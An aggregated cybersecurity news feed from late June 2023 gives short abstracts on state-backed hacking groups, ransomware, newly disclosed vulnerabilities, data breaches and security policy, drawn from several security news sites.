June, 2023
June 30, 2023 – General
Japan Threat Landscape Takes on Global Significance Full Text
Abstract
The primary cause of cyberattacks against Japanese computer systems is the strength and quality of its manufacturing base. The size of Japanese manufacturers makes them an attractive target for criminal extortion.Cyware
June 30, 2023 – Hacker
Iranian Hackers Charming Kitten Utilize POWERSTAR Backdoor in Targeted Espionage Attacks Full Text
Abstract
Charming Kitten, the nation-state actor affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR. "There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence," Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week. The threat actor is something of an expert when it comes to employing social engineering to lure targets, often crafting tailored fake personas on social media platforms and engaging in sustained conversations to build rapport before sending a malicious link. It's also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda. Recent intrusions orchestrated by Charming Kitten have made use of other implants such as PowerLess and BellaCiaoThe Hacker News
June 30, 2023 – APT
Iran-linked Charming Kitten APT enhanced its POWERSTAR Backdoor Full Text
Abstract
Iran-linked Charming Kitten group used an updated version of the PowerShell backdoor called POWERSTAR in a spear-phishing campaign. Security firm Volexity observed the Iran-linked Charming Kitten (aka APT35, Phosphorus, Newscaster, and Ajax Security Team)...Security Affairs
June 30, 2023 – General
3 Reasons SaaS Security is the Imperative First Step to Ensuring Secure AI Usage Full Text
Abstract
In today's fast-paced digital landscape, the widespread adoption of AI (Artificial Intelligence) tools is transforming the way organizations operate. From chatbots to generative AI models, these SaaS-based applications offer numerous benefits, from enhanced productivity to improved decision-making. Employees using AI tools experience the advantages of quick answers and accurate results, enabling them to perform their jobs more effectively and efficiently. This popularity is reflected in the staggering numbers associated with AI tools. OpenAI's viral chatbot, ChatGPT, has amassed approximately 100 million users worldwide, while other generative AI tools like DALL·E and Bard have also gained significant traction for their ability to generate impressive content effortlessly. The generative AI market is projected to exceed $22 billion by 2025, indicating the growing reliance on AI technologies. However, amidst the enthusiasm surrounding AI adoption, it is imperative to addressThe Hacker News
June 30, 2023 – Vulnerabilities
miniOrange’s WordPress Social Login and Register plugin was affected by a critical auth bypass bug Full Text
Abstract
A critical authentication bypass flaw in miniOrange’s WordPress Social Login and Register plugin, can allow gaining access to any account on a site. Wordfence researchers discovered an authentication bypass vulnerability in miniOrange’s WordPress...Security Affairs
June 30, 2023 – Solution
WhatsApp Upgrades Proxy Feature Against Internet Shutdowns Full Text
Abstract
Meta's WhatsApp has rolled out updates to its proxy feature, allowing more flexibility in the kind of content that can be shared in conversations. This includes the ability to send and receive images, voice notes, files, stickers and GIFs, WhatsApp told The Hacker News. The new features were first reported by BBC Persian. Some of the other improvements include streamlined steps to simplify the setup process as well as the introduction of shareable links to "share functioning/valid proxy addresses to their contacts for easy and automatic installation." Support for proxy servers was officially launched by the messaging service earlier this January , thereby helping users circumvent government-imposed censorship and internet shutdowns and obtain indirect access to WhatsApp. The company has also made available a reference implementation for setting up a proxy server with ports 80, 443 or 5222 available and domain name that points to the server's IP address. &The Hacker News
June 30, 2023 – APT
North Korea-linked Andariel APT used a new malware named EarlyRat last year Full Text
Abstract
North Korea-linked cyberespionage group Andariel used a previously undocumented malware called EarlyRat. Kaspersky researchers reported that the North Korea-linked APT group Andariel used a previously undocumented malware dubbed EarlyRat in...Security Affairs
June 30, 2023 – Criminals
Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign Full Text
Abstract
An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. "This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain," Akamai researcher Allen West said in a Thursday report. Unlike cryptojacking, in which a compromised system's resources are used to illicitly mine cryptocurrency, proxyjacking offers the ability for threat actors to leverage the victim's unused bandwidth to covertly run different services as a P2P node. This offers two-fold benefits: It not only enables the attacker to monetize the extra bandwidth with a significantly reduced resource load that would be necessary to carry out cryptojacking, it also reduces the chances of discovery. "It is a stealthier alternative to cryptojacking and has serious implications that caThe Hacker News
June 30, 2023 – General
MITRE Unveils Top 25 Most Dangerous Software Weaknesses of 2023: Are You at Risk? Full Text
Abstract
MITRE has released its annual list of the Top 25 "most dangerous software weaknesses" for the year 2023. "These weaknesses lead to serious vulnerabilities in software," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said . "An attacker can often exploit these vulnerabilities to take control of an affected system, steal data, or prevent applications from working." The list is based on an analysis of public vulnerability data in the National Vulnerability Data ( NVD ) for root cause mappings to CWE weaknesses for the previous two years. A total of 43,996 CVE entries were examined and a score was attached to each of them based on prevalence and severity. Coming out top is Out-of-bounds Write, followed by Cross-site Scripting, SQL Injection, Use After Free, OS Command Injection, Improper Input Validation, Out-of-bounds Read, Path Traversal, Cross-Site Request Forgery (CSRF), and Unrestricted Upload of File with Dangerous Type. Out-ofThe Hacker News
June 29, 2023 – Attack
8Base Ransomware Activity Spikes, Researcher Warn Full Text
Abstract
Ransomware threat 8Base has been conducting double extortion attacks for over a year and its activities spiked suddenly in May and June 2023. 8Base has been connected to 67 attacks by Malwarebytes and NCC Group. Approximately 50% of the targeted victims belong to the business services, manufacturin ... Read MoreCyware
June 29, 2023 – Hacker
From MuddyC3 to PhonyC2: Iran’s MuddyWater Evolves with a New Cyber Weapon Full Text
Abstract
The Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that's been put to use by the actor since 2021. Evidence shows that the custom made, actively developed framework has been leveraged in the February 2023 attack on Technion , an Israeli research institute, cybersecurity firm Deep Instinct said in a report shared with The Hacker News. What's more, additional links have been unearthed between the Python 3-based program and other attacks carried out by MuddyWater, including the ongoing exploitation of PaperCut servers . "It is structurally and functionally similar to MuddyC3 , a previous MuddyWater custom C2 framework that was written in Python 2," security researcher Simon Kenin said. "MuddyWater is continuously updating the PhonyC2 framework and changing TTPs to avoid detection." MuddyWater, also known as Mango Sandstorm (previously Mercury), is a cyberThe Hacker News
June 29, 2023 – Breach
The phone monitoring app LetMeSpy disclosed a data breach Full Text
Abstract
Android app LetMeSpy disclosed a security breach, sensitive data associated with thousands of Android users were exposed. The phone monitoring app LetMeSpy disclosed a security breach, threat actors have stolen sensitive data associated with thousands...Security Affairs
June 29, 2023 – Government
European Cyber Agency Remains Underfunded Full Text
Abstract
There are multiple discrepancies in how the European Commission allocates funds to the cyber agency, Juhan Lepassaar, the executive director of the EU Agency for Cybersecurity, said during a Tuesday parliamentary hearing evaluating allocated budgets.Cyware
June 29, 2023 – Malware
Fluhorse: Flutter-Based Android Malware Targets Credit Cards and 2FA Codes Full Text
Abstract
Cybersecurity researchers have shared the inner workings of an Android malware family called Fluhorse . The malware "represents a significant shift as it incorporates the malicious components directly within the Flutter code," Fortinet FortiGuard Labs researcher Axelle Apvrille said in a report published last week. Fluhorse was first documented by Check Point in early May 2023, detailing its attacks on users located in East Asia through rogue apps masquerading as ETC and VPBank Neo, which are popular in Taiwan and Vietnam. The initial intrusion vector for the malware is phishing. The ultimate goal of the app is to steal credentials, credit card details, and two-factor authentication (2FA) codes received as SMS to a remote server under the control of the threat actors. The latest findings from Fortinet, which reverse-engineered a Fluhorse sample uploaded to VirusTotal on June 11, 2023, suggest that the malware has evolved, incorporating additional sophistication bThe Hacker News
June 29, 2023 – Malware
Previously undetected ThirdEye malware appears in the threat landscape Full Text
Abstract
A new Windows information stealer dubbed ThirdEye appeared in the threat landscape, it has been active since April. Fortinet FortiGuard Labs discovered a previously undetected information stealer named ThirdEye. The malicious code is not sophisticated...Security Affairs
June 29, 2023 – Vulnerabilities
Details Disclosed for Critical SAP Vulnerabilities, Including Wormable Exploit Chain Full Text
Abstract
The vulnerabilities are tracked as CVE-2021-27610, CVE-2021-33677, CVE-2021-33684, and CVE-2023-0014, and they impact products that use the SAP Application Server for ABAP component.Cyware
June 29, 2023 – Solution
The Right Way to Enhance CTI with AI (Hint: It’s the Data) Full Text
Abstract
Cyber threat intelligence is an effective weapon in the ongoing battle to protect digital assets and infrastructure - especially when combined with AI. But AI is only as good as the data feeding it. Access to unique, underground sources is key. Threat Intelligence offers tremendous value to people and companies. At the same time, its ability to address organizations' cybersecurity needs and the benefits it offers vary by company, industry, and other factors. A common challenge with cyber threat intelligence (CTI) is that the data it produces can be vast and overwhelming, creating confusion and inefficiencies among security teams' threat exposure management efforts. Additionally, organizations have different levels of security maturity, which can make access to and understanding of CTI data difficult. Enter generative AI. Many cybersecurity companies – and more specifically, threat intelligence companies – are bringing generative AI to market to simplify threat intelligence aThe Hacker News
June 29, 2023 – Criminals
Former Group-IB manager has been arrested in Kazahstan Full Text
Abstract
The former head of network security at Group-IB has been arrested in Kazakhstan based on a request from U.S. law enforcement. Nikita Kislitsin who worked as the head of network security at Group-IB, as well as its Russian-based spinoff company (known...Security Affairs
June 29, 2023 – General
Saudi Arabia’s Cyber Capabilities Ranked Second Globally Full Text
Abstract
According to the IIMD, the development of a National Cybersecurity Authority (NCA) and the planned development of a Global Cybersecurity Forum institute in the country have both affirmed Saudi Arabia's role in the field of cybersecurity.Cyware
June 29, 2023 – Hacker
North Korean Hacker Group Andariel Strikes with New EarlyRat Malware Full Text
Abstract
The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. "Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff ) and other subordinate elements collectively tracked under the umbrella name Lazarus Group . The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income to the sanctions-hit nation. Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backdThe Hacker News
June 29, 2023 – Vulnerabilities
Experts published PoC exploits for Arcserve UDP authentication bypass issue Full Text
Abstract
Data protection firm Arcserve addressed an authentication bypass vulnerability in its Unified Data Protection (UDP) backup software. Data protection vendor Arcserve addressed a high-severity bypass authentication flaw, tracked as CVE-2023-26258, in its Unified...Security Affairs
June 29, 2023 – Government
Cyber Command to expand ‘canary in the coal mine’ unit working with private sector Full Text
Abstract
U.S. Cyber Command is doubling the size of a little-known program that serves as one of the military's chief links to private industry in order to bolster the country’s defenses against cyber threats.Cyware
June 29, 2023 – Breach
Android Spy App LetMeSpy Suffers Major Data Breach, Exposing Users’ Personal Data Full Text
Abstract
Android-based phone monitoring app LetMeSpy has disclosed a security breach that allowed an unauthorized third-party to steal sensitive data associated with thousands of Android users. "As a result of the attack, the criminals gained access to email addresses, telephone numbers and the content of messages collected on accounts," LetMeSpy said in an announcement on its website, noting the incident took place on June 21, 2023. Following the discovery of the hack, LetMeSpy said it notified law enforcement and data protection authorities. It's also taking steps to suspend all account-related functions until further notice. The identity of the threat actor and their motives are currently unknown. The work of a Polish company named Radeal, LetMeSpy is offered as a monthly subscription ($6 for Standard or $12 for Pro), allowing its customers to snoop on others simply by installing the software on their devices. An Internet Archive snapshot from December 2013 shows that iThe Hacker News
June 29, 2023 – Hacker
Manic Menagerie 2.0: The Evolution of a Highly Motivated Threat Actor Full Text
Abstract
The threat actor used a variety of tactics, techniques, and tools to evade detection and maintain access to the compromised networks, including deploying web shells, exploiting vulnerabilities, and attempting local privilege escalation.Cyware
June 29, 2023 – Vulnerabilities
Critical Security Flaw in Social Login Plugin for WordPress Exposes Users’ Accounts Full Text
Abstract
A critical security flaw has been disclosed in miniOrange's Social Login and Register plugin for WordPress that could enable a malicious actor to log in as any user-provided information about email address is already known. Tracked as CVE-2023-2982 (CVSS score: 9.8), the authentication bypass flaw impacts all versions of the plugin, including and prior to 7.6.4. It was addressed on June 14, 2023, with the release of version 7.6.5 following responsible disclosure on June 2, 2023. "The vulnerability makes it possible for an unauthenticated attacker to gain access to any account on a site including accounts used to administer the site, if the attacker knows, or can find, the associated email address," Wordfence researcher István Márton said . The issue is rooted in the fact that the encryption key used to secure the information during login using social media accounts is hard-coded, thus leading to a scenario where attackers could create a valid request with a properlThe Hacker News
June 29, 2023 – Ransomware
Dark Power Ransomware on the Ascent – A Technical Insight into 2023’s Latest Ransomware Strain Full Text
Abstract
Dark Power is a highly advanced ransomware strain that uses advanced encryption techniques and targets various industries globally. It stops critical system services and processes, encrypts files, and drops a ransom note with payment instructions.Cyware
June 29, 2023 – Malware
Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data Full Text
Abstract
A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts. Fortinet FortiGuard Labs, which made the discovery , said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK Rules for issuing sick leaves.pdf.exe." The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features. The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, register usernames, and volume information. The amassed details are then traThe Hacker News
June 29, 2023 – Criminals
Security analyst wanted by both Russia and the US Full Text
Abstract
A Russian network security specialist and former editor of Hacker magazine who is wanted by the US and Russia on cybercrime charges has been detained in Kazakhstan as the two governments seek his extradition.Cyware
June 29, 2023 – Breach
US Patent and Trademark Office Notifies Filers of Years-Long Data Leak Full Text
Abstract
The U.S. Patent and Trademark Office (USPTO) said in a notice sent to affected trademark applicants that their private domicile address — often their home address — inadvertently appeared in public records between February 2020 and March 2023.Cyware
June 28, 2023 – Solution
Microsoft Sysmon now detects when executables files are created Full Text
Abstract
Microsoft has released Sysmon 15, converting it into a protected process and adding the new 'FileExecutableDetected' option to log when executable files are created.BleepingComputer
June 28, 2023 – Malware
Infectious NPM and PyPI Packages Raise Fresh Supply Chain Concerns Full Text
Abstract
Security researchers have laid bare an ongoing attack campaign that specifically targets the npm ecosystem via a pair of malicious packages. Meanwhile, another researcher group reported seven malicious PyPI packages. Developers, package maintainers, and users must remain diligent in verifying the i ... Read MoreCyware
June 28, 2023 – Vulnerabilities
Alert: New Electromagnetic Attacks on Drones Could Let Attackers Take Control Full Text
Abstract
Drones that don't have any known security weaknesses could be the target of electromagnetic fault injection (EMFI) attacks, potentially enabling a threat actor to achieve arbitrary code execution and compromise their functionality and safety. The research comes from IOActive, which found that it is "feasible to compromise the targeted device by injecting a specific EM glitch at the right time during a firmware update." "This would allow an attacker to gain code execution on the main processor, gaining access to the Android OS that implements the core functionality of the drone," Gabriel Gonzalez, director of hardware security at the company, said in a report published this month. The study , which was undertaken to determine the current security posture of Unmanned Aerial Vehicles (UAVs), was carried out on Mavic Pro , a popular quadcopter drone manufactured by DJI that employs various security features like signed and encrypted firmware, Trusted ExecutiThe Hacker News
June 28, 2023 – Attack
Using Electromagnetic Fault Injection Attacks to take over drones Full Text
Abstract
Electromagnetic fault injection (EMFI) attacks on drones can potentially allow attackers to achieve arbitrary code execution and take over them. While the use of drones continues to grow, researchers from IOActive analyzed how to develop fault injection...Security Affairs
June 28, 2023 – Vulnerabilities
Exploit released for new Arcserve UDP auth bypass vulnerability Full Text
Abstract
Data protection vendor Arcserve has addressed a high-severity security flaw in its Unified Data Protection (UDP) backup software that can let attackers bypass authentication and gain admin privileges.BleepingComputer
June 28, 2023 – Vulnerabilities
Numerous Devices Discovered Violating CISA’s BOD Full Text
Abstract
Censys has recently analyzed the attack surfaces of over 50 FCEB organizations and detected several hundred devices to be publicly exposed to a variety of cybersecurity threats. They are not secured according to CISA’s latest Binding Operational Directive (BOD). Moreover, software programs suc ... Read MoreCyware
June 28, 2023 – Criminals
CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million Full Text
Abstract
Cybersecurity researchers have exposed the workings of a scam ring called CryptosLabs that's estimated to have made €480 million in illegal profits by targeting users in French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate's massive fake investment schemes primarily involve impersonating 40 well-known banks, fin-techs, asset management firms, and crypto platforms, setting up a scam infrastructure spanning over 350 domains hosted on more than 80 servers, Group-IB said in a deep-dive report. The Singapore-headquartered company described the criminal outfit as "operated by a hierarchy of kingpins, sales agents, developers, and call center operators" who are recruited to ensnare potential victims by promising high returns on their capital. "CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as 'managers' and creating fake landing pages, sociaThe Hacker News
June 28, 2023 – General
Experts warn of a spike in May and June of 8Base ransomware attacks Full Text
Abstract
Researchers warn of a massive spike in May and June 2023 of the activity associated with the ransomware group named 8Base. VMware Carbon Black researchers observed an intensification of the activity associated with a stealthy ransomware group named 8Base....Security Affairs
June 28, 2023 – Ransomware
– Ransomware
Linux version of Akira ransomware targets VMware ESXi servers Full Text
Abstract
The Akira ransomware operation uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide.BleepingComputer
June 28, 2023 – Business
Astrix Security, which uses ML to secure app integrations, raises $25M Full Text
Abstract
Astrix Security, a platform that helps companies manage and secure third-party app integrations, today announced that it closed a $25 million Series A funding round led by CRV with participation from Bessemer Venture Partners and F2 Venture Capital.Cyware
June 28, 2023 – Education
5 Things CISOs Need to Know About Securing OT Environments Full Text
Abstract
For too long the cybersecurity world focused exclusively on information technology (IT), leaving operational technology (OT) to fend for itself. Traditionally, few industrial enterprises had dedicated cybersecurity leaders. Any security decisions that arose fell to the plant and factory managers, who are highly skilled technical experts in other areas but often lack cybersecurity training or knowledge. In more recent years, an uptick in cyberattacks against industrial facilities and the trend of IT/OT convergence driven by Industry 4.0 have highlighted the vacuum of ownership around OT security. According to a new Fortinet report , most organizations are looking to Chief Information Security Officers (CISOs) to solve the problem. Fortunately, CISOs are no strangers to change or difficult challenges. The position itself is less than 20 years old, yet in those two decades CISOs have navigated some of the most disruptive cybersecurity events that were truly watershed moments in technoThe Hacker News
June 28, 2023 – Vulnerabilities
Critical SQL Injection flaws in Gentoo Soko can lead to Remote Code Execution Full Text
Abstract
SQL injection vulnerabilities in Gentoo Soko could lead to remote code execution (RCE) on impacted systems. SonarSource researchers discovered two SQL injection vulnerabilities in Gentoo Soko, collectively tracked as CVE-2023-28424 (CVSS score: 9.1)...Security Affairs
June 28, 2023 – Solution
Brave Browser boosts privacy with new local resources restrictions Full Text
Abstract
The Brave team has announced that the privacy-centric browser will soon introduce new restriction controls allowing users to specify how long sites can access local network resources.BleepingComputer
June 28, 2023 – Vulnerabilities
NPM Registry Found to be Vulnerable to ‘Manifest Confusion’ Abuse Full Text
Abstract
The npm Public Registry, a database of JavaScript packages, fails to compare npm package manifest data with the archive of files that data describes, creating an opportunity for the installation and execution of malicious files.Cyware
June 28, 2023 – Ransomware
8Base Ransomware Spikes in Activity, Threatens U.S. and Brazilian Businesses Full Text
Abstract
A ransomware threat called 8Base that has been operating under the radar for over a year has been attributed to a "massive spike in activity" in May and June 2023. "The group utilizes encryption paired with 'name-and-shame' techniques to compel their victims to pay their ransoms," VMware Carbon Black researchers Deborah Snyder and Fae Carlisle said in a report shared with The Hacker News. "8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries." 8Base, according to statistics gathered by Malwarebytes and NCC Group , has been linked to 67 attacks as of May 2023, with about 50% of the victims operating in the business services, manufacturing, and construction sectors. A majority of the targeted companies are located in the U.S. and Brazil. With very little known about the operators of the ransomware, its origins remain something of a cipher. What's evident is that it has been active sincThe Hacker News
June 28, 2023 – Criminals
EncroChat dismantling led to 6,558 arrests and the seizure of $979M in criminal funds Full Text
Abstract
Europol announced that the takedown of the EncroChat encrypted chat network has led to the arrest of 6,558 people and the seizure of $979 million in illicit funds. Europol announced that the dismantling of the encrypted chat network EncroChat has led to the arrest...Security Affairs
June 28, 2023 – Vulnerabilities
NPM ecosystem at risk from “Manifest Confusion” attacks Full Text
Abstract
The NPM (Node Package Manager) registry suffers from a security lapse called "manifest confusion," which undermines the trustworthiness of packages and makes it possible for attackers to hide malware in dependencies or perform malicious script execution during installation.BleepingComputer
June 28, 2023 – Phishing
Ukraine Cracks Down on Investment Scams, Raids Call Centers Full Text
Abstract
Ukrainian cyber police raided and closed over a dozen fraudulent call centers last week, saying the operations were running fake investment scams that involved stealing cryptocurrency and payment card details from European and Central Asian citizens.Cyware
June 28, 2023 – Vulnerabilities
Critical SQL Injection Flaws Expose Gentoo Soko to Remote Code Execution Full Text
Abstract
Multiple SQL injection vulnerabilities have been disclosed in Gentoo Soko that could lead to remote code execution (RCE) on vulnerable systems. "These SQL injections happened despite the use of an Object-Relational Mapping (ORM) library and prepared statements," SonarSource researcher Thomas Chauchefoin said , adding they could result in RCE on Soko because of a "misconfiguration of the database." The two issues , which were discovered in the search feature of Soko, have been collectively tracked as CVE-2023-28424 (CVSS score: 9.1). They were addressed within 24 hours of responsible disclosure on March 17, 2023. Soko is a Go software module that powers packages.gentoo.org , offering users an easy way to search through different Portage packages that are available for Gentoo Linux distribution. But the shortcomings identified in the service meant that it could have been possible for a malicious actor to inject specially crafted code , resulting in the expoThe Hacker News
June 28, 2023 – General
The Current State of Business Email Compromise Attacks Full Text
Abstract
Business Email Compromise (BEC) poses a growing threat to businesses of all sizes. Learn more from Specops Software about the types of BEC attacks and how to avoid them.BleepingComputer
June 28, 2023 – Breach
Victim Count in Ransomware Attack at Maryland Healthcare Provider Jumps Fivefold to 137,000 Full Text
Abstract
A Berlin, Maryland-based hospital recently told regulators that a ransomware breach discovered in January had compromised the sensitive information of nearly 137,000 patients, about five times the number of people originally estimated to be affected.Cyware
June 28, 2023 – Criminals
8Base ransomware gang escalates double extortion attacks in June Full Text
Abstract
A 8Base ransomware gang is targeting organizations worldwide in double-extortion attacks, with a steady stream of new victims since the beginning of June.BleepingComputer
June 28, 2023 – Business
Cyera Raises $100M to Bring Data Protection to Hybrid Cloud Full Text
Abstract
The startup, founded by longtime Israeli Military Intelligence leaders, landed the Accel-led $100 million Series B funding to support the cloud and on-premises data protection needs of hybrid organizations.Cyware
June 28, 2023 – Policy and Law
SolarWinds says SEC investigation ‘progressing to charges’ Full Text
Abstract
SolarWinds — the technology firm at the center of a December 2020 hack that affected multiple U.S. government agencies — said its executives may soon face charges from the Securities and Exchange Commission (SEC) for its response to the incident.Cyware
June 28, 2023 – Government
UAE, Israel create ‘Crystal Ball’ platform to fight hackers Full Text
Abstract
The mission is to “design, deploy and enable regional intelligence enhancement” through collaboration and knowledge-sharing to combat national-level cyberthreats, according to a presentation by Mohamed Al Kuwaiti, UAE head of cybersecurity.Cyware
June 27, 2023 – Breach
Siemens Energy confirms data breach after MOVEit data-theft attack Full Text
Abstract
Siemens Energy has confirmed that data was stolen during the recent Clop ransomware data-theft attacks using a zero-day vulnerability in the MOVEit Transfer platform.BleepingComputer
June 27, 2023 – Policy and Law
Hundreds of devices found violating new CISA federal agency directive Full Text
Abstract
Censys researchers have discovered hundreds of Internet-exposed devices on the networks of U.S. federal agencies that have to be secured according to a recently issued CISA Binding Operational Directive.BleepingComputer
June 27, 2023 – Criminals
EncroChat takedown led to 6,500 arrests and $979 million seized Full Text
Abstract
Europol announced today that the takedown of the EncroChat encrypted mobile communications platform has led to the arrest of over 6,600 people and the seizure of $979 million in illicit funds.BleepingComputer
June 27, 2023 – General
Just released: Session tracks for Mandiant’s 2023 mWISE event Full Text
Abstract
There are just a few days left to get the lowest price available for the mWISE cybersecurity conference. It runs from September 18 - 20, 2023 in Washington, DC. If you register now, you'll get 45% off the standard conference rate.BleepingComputer
June 27, 2023 – Malware
New Mockingjay process injection technique evades EDR detection Full Text
Abstract
A new process injection technique named 'Mockingjay' could allow threat actors to bypass EDR (Endpoint Detection and Response) and other security products to stealthily execute malicious code on compromised systems.BleepingComputer
June 27, 2023 – Malware
Hackers Steal Messages, Call Logs, and Locations Intercepted by Phone Monitoring App Full Text
Abstract
The phone monitoring app, which is used to spy on thousands of people using Android phones, said in a notice on its login page that on June 21, “a security incident occurred involving obtaining unauthorized access to the data of website users??.”Cyware
June 27, 2023 – Malware
New Mockingjay Process Injection Technique Could Let Malware Evade Detection Full Text
Abstract
A new process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems. "The injection is executed without space allocation, setting permissions or even starting a thread," Security Joes researchers Thiago Peixoto, Felipe Duarte, and Ido Naor said in a report shared with The Hacker News. "The uniqueness of this technique is that it requires a vulnerable DLL and copying code to the right section." Process injection is an attack method that allows adversaries to inject code into processes in order to evade process-based defenses and elevate privileges. In doing so, it could allow for the execution of arbitrary code in the memory space of a separate live process. Some of the well-known process injection techniques include dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging, amonThe Hacker News
June 27, 2023 – Malware
Mockingjay process injection technique allows EDR bypass Full Text
Abstract
Mockingjay is a new process injection technique that can be exploited to bypass security solutions to execute malware on compromised systems. A new process injection technique dubbed Mockingjay can be exploited by attackers to bypass security controls...Security Affairs
June 27, 2023 – Vulnerabilities
Experts found hundreds of devices within federal networks having internet-exposed management interfaces Full Text
Abstract
Researchers at Censys have analyzed the attack surfaces of more than 50 Federal Civilian Executive Branch (FCEB) organizations and sub-organizations and discovered more than 13,000 distinct hosts across 100 autonomous systems.Cyware
June 27, 2023 – Attack
New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain Full Text
Abstract
Cybersecurity researchers have discovered a new ongoing campaign aimed at the npm ecosystem that leverages a unique execution chain to deliver an unknown payload to targeted systems. "The packages in question seem to be published in pairs, each pair working in unison to fetch additional resources which are subsequently decoded and/or executed," software supply chain security firm Phylum said in a report released last week. To that end, the order in which the pair of packages are installed is paramount to pulling off a successful attack, as the first of the two modules are designed to store locally a token retrieved from a remote server. The campaign was first discovered on June 11, 2023. The second package subsequently passes this token as a parameter alongside the operating system type to an HTTP GET request to acquire a second script from the remote server. A successful execution returns a Base64-encoded string that is immediately executed but only if that string isThe Hacker News
June 27, 2023 – Government
Experts found hundreds of devices within federal networks having internet-exposed management interfaces Full Text
Abstract
Researchers at Censys have identified hundreds of devices deployed within federal networks that have internet-exposed management interfaces. Researchers at Censys have analyzed the attack surfaces of more than 50 Federal Civilian Executive Branch...Security Affairs
June 27, 2023 – Attack
Senior Choice, Inc. Provides Notice of Security Incident Full Text
Abstract
The company, which manages three residential facilities in Pennsylvania, discovered suspicious activity in its internal systems used for business operations and immediately implemented measures to contain the situation.Cyware
June 27, 2023 – Solution
Beyond Asset Discovery: How Attack Surface Management Prioritizes Vulnerability Remediation Full Text
Abstract
As the business environment becomes increasingly connected, organizations' attack surfaces continue to expand, making it challenging to map and secure both known and unknown assets. In particular, unknown assets present security challenges related to shadow IT, misconfigurations, ineffective scan coverage, among others. Given attack surface sprawl and evolving threats, many organizations are embracing attack surface management (ASM) tools to discover and address critical exposures. Asset discovery is an important capability to have, and one that's helping to drive the adoption of attack surface management tools and services. That said, asset discovery is only one aspect of effective attack surface management. Making the attack surface as impenetrable as possible takes offensive security that goes far beyond the discovery phase. Why Asset Discovery Isn't Enough Given the complexity and ever-expanding scale of the digital infrastructure at most companies, cataloging all the knownThe Hacker News
June 27, 2023 – Attack
Schneider Electric and Siemens Energy are two more victims of a MOVEit attack Full Text
Abstract
Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including Schneider Electric and Siemens Energy. The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial...Security Affairs
June 27, 2023 – Business
Socure Buys Berbix for $70M to Fortify Identity Verification Full Text
Abstract
The Nevada-based identity verification company said the acquisition of San Francisco-based Berbix will help it optimize the digital capturing and back-end processing of driver's licenses and passports at faster speeds and with greater accuracy.Cyware
June 27, 2023 – Criminals
EncroChat Bust Leads to 6,558 Criminals’ Arrests and €900 Million Seizure Full Text
Abstract
Europol on Tuesday announced that the takedown of EncroChat in July 2020 led to 6,558 arrests worldwide and the seizure of €900 million in illicit criminal proceeds. The law enforcement agency said that a subsequent joint investigation initiated by French and Dutch authorities intercepted and analyzed over 115 million conversations that took place over the encrypted messaging platform between no less than 60,000 users. Now almost three years later, the information obtained from digital correspondence has resulted in - Arrests of 6,558 suspects, including 197 high-value targets 7,134 years of imprisonment of convicted criminals Confiscation of €739.7 million in cash Freeze of €154.1 million frozen in assets or bank accounts Seizure of 30.5 million pills of chemical drugs Seizure of 103.5 tonnes of cocaine, 163.4 tonnes of cannabis, and 3.3 tonnes of heroin Seizure of 971 vehicles, 83 boats, and 40 planes Seizure of 271 estates or homes, and Seizure of 923 weapons, as wellThe Hacker News
June 27, 2023 – Cryptocurrency
JOKERSPY used to target a cryptocurrency exchange in Japan Full Text
Abstract
An unnamed Japanese cryptocurrency exchange was the victim of a cyber attack aimed at deploying an Apple macOS backdoor named JokerSpy. Elastic Security Labs researchers provided details about a recently discovered intrusion at an unnamed cryptocurrency...Security Affairs
June 27, 2023 – Breach
Schneider Electric and Siemens Energy Among the Latest Victims of MOVEit Zero-Day Attacks Full Text
Abstract
The Cl0p ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial control systems giants Schneider Electric and Siemens Energy.Cyware
June 27, 2023 – Malware
Anatsa Banking Trojan Targeting Users in US, UK, Germany, Austria, and Switzerland Full Text
Abstract
